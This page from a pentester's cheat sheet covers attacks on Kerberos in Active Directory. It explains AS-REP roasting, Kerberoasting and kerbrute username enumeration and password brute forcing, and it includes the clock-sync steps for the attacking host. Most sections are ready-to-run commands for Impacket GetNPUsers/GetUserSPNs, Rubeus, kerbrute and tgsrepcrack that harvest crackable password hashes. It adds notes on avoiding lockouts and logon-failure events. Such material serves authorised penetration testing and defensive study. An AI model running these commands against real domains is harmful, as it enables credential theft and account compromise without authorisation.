# TCP 88: Kerberos

> Kerberos is a computer-network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.
>
> \-- [*Wikipedia*](https://en.wikipedia.org/wiki/Kerberos_\(protocol\))

## Related

* [Active Directory](/the-pentesters-cheat-sheet/services/misc/active-directoy.md)
* [TCP 389, 636, 3268, 3269: LDAP](/the-pentesters-cheat-sheet/services/tcp/tcp-389-636-3268-3269-ldap.md)
* [Impacket](/the-pentesters-cheat-sheet/misc/impacket.md)
* [GitHub: TarlogicSecurity/kerberos\_attacks\_cheatsheet.md](https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a)

## AS-REP Roasting

If Kerberos preauthentication is disabled for a user ("Do not require Kerberos preauthentication" on the account), the Key Distribution Center (KDC) answers an AS\_REQ for that user with a Ticket Granting Ticket (TGT) without first demanding proof that we know the password.\
Part of the reply (AS\_REP, the `enc-part`) is encrypted with a key derived from the user's password (for RC4-HMAC, etype 23, that key is the NT hash), so it can be cracked offline, e.g. with hashcat mode 18200.

See also [YouTube - Conda - Attacking Active Directory - AS-REP Roasting](https://www.youtube.com/watch?v=EVdwnBFtUtQ).

### Requirements

* Only works on user accounts that have Kerberos preauthentication disabled (`DONT_REQ_PREAUTH` in `userAccountControl`)
* A list of candidate usernames; the request itself needs no domain credentials, but with a domain account the affected users can be queried directly from LDAP

### Impacket

Without credentials, feed a username list and let the tool report a crackable hash for every name that exists and has preauthentication disabled; with a domain account, omit the list and it finds the affected users via LDAP itself:

```bash
GetNPUsers.py <domain>/ -usersfile <usernames.txt> -no-pass -format hashcat -dc-ip <ip> -outputfile asrep.txt
GetNPUsers.py <domain>/<username>:<password> -request -format hashcat -dc-ip <ip>
```

### Rubeus

```
Rubeus.exe asreproast /user:<username> /dc:<ip> /domain:<domain> /outfile:hashes.txt /format:hashcat
```

### kerbrute

Kerbrute sends AS\_REQs without preauthentication data and sorts the KDC's answers: a non-existent principal and an existing user that requires preauthentication come back with different KRB-ERROR codes, so usernames can be enumerated without credentials. Enumeration does not count as a failed logon (no 4625 events, no lockout); the requests only show up on the DC as Kerberos TGT request events (4768). Users that are found without preauthentication are directly AS-REP roastable.\
[GitHub - ropnop/kerbrute](https://github.com/ropnop/kerbrute)

Enumerate users

```bash
./kerbrute_linux_386 userenum -d <domain> --dc <domaincontroller> <usernames.txt>
```

Bruteforce the password of one user. Unlike enumeration, every wrong guess counts against the account lockout threshold, so check the domain password policy first:

```bash
./kerbrute_linux_386 bruteuser -d <domain> --dc <domaincontroller> <password-list> <username>
```

## Kerberoasting

With any domain account we can request (TGS\_REQ) a service ticket (TGS) for every account that has a Service Principal Name (SPN): the KDC issues the ticket regardless of whether we are allowed to use the service, because authorisation is enforced by the service, not by the KDC.\
The reply (TGS\_REP) contains the ticket encrypted with a key derived from the service account's password (the NT hash for RC4-HMAC, etype 23), so it can be cracked offline, e.g. with hashcat mode 13100.

See also [YouTube - Conda - Attacking Active Directory - Kerberoasting](https://www.youtube.com/watch?v=-3MxoxdzFNI)

### Requirements

* Only accounts with a Service Principal Name (SPN) can be targeted; restrict the list to user accounts, because machine accounts also carry SPNs but use long random passwords that will not crack
* Creds/user account on the domain (low privilege is sufficient)

### Impacket

Run it once without `-request` to list the SPN accounts, then request the tickets (hashcat format by default):

```bash
GetUserSPNs.py <domain>/<username>:<password> -dc-ip <ip> -request -outputfile kerberoast.txt
```

### Rubeus

```
Rubeus.exe kerberoast /outfile:hashes.txt
```

Use `/user:<username>` or `/spn:<spn>` to roast a single account instead of every SPN in the domain.

### kerberoast

The Kali package ships the original Python scripts of the kerberoast project; `tgsrepcrack.py` cracks service tickets in `.kirbi` format.

```bash
sudo apt install kerberoast
```

Request tickets for the target SPNs on a domain-joined host, export them with [Mimikatz](/the-pentesters-cheat-sheet/privilege-escalation/windows/02-mimikatz.md) (`kerberos::list /export` writes one `.kirbi` file per ticket) and crack them offline:

```bash
python /usr/share/kerberoast/tgsrepcrack.py <wordlist> <exported-ticket.kirbi>
```

## Sync time

Kerberos only accepts timestamps within the KDC's clock-skew tolerance (5 minutes by default in Active Directory), so the attacking host's clock must match the domain controller. If the host runs an NTP client (`systemd-timesyncd`, `chrony`), stop it first, otherwise it will undo a manual correction.

**Error** (when not synced)

> SessionError: KRB\_AP\_ERR\_SKEW(Clock skew too great)

### ntpdate

```bash
ntpdate <dc-ip>
```

### Manually

**Get the DC's time** (the `smb2-time` script reports it in UTC, `clock-skew` gives the offset from the local clock)

```bash
nmap -sC -sV <ip>
```

```
Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-03-20T00:14:12
|_  start_date: N/A
```

**Set local time accordingly**

```bash
date -s "20 Mar 2020 00:14:12+00:00"
```

